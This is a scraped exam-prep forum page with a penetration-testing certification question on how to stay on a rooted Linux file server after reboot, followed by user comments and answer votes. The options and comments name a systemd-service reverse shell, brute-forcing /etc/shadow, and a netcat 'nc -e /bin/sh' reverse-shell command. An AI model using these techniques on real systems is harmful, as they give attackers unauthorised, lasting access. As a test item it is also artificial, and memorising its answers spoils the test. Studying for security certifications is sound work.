A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
A.
Create a one-shot systemd service to establish a reverse shell.
B.
Obtain /etc/shadow and brute force the root password.
C.
Run the nc -e /bin/sh <...> command.
D.
Move laterally to create a user account on LDAP
C is not right as the netcat shell will be terminated on reboot. I would go with option A.
You can check this link here that describes how to abuse the systemd user service: https://hosakacorp.net/p/systemd-user.html
C is not correct. Establish persistence - abuse service, set cron job to start
upvoted 1 times
...
This section is not available anymore. Please use the main Exam Page.PT1-002 Exam Questions
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
BinarySoldier
Highly Voted 3 years, 5 months agoShinobiGrappler
Most Recent 2 years, 8 months agosome_specialist
3 years, 1 month agobrandonl
3 years, 1 month ago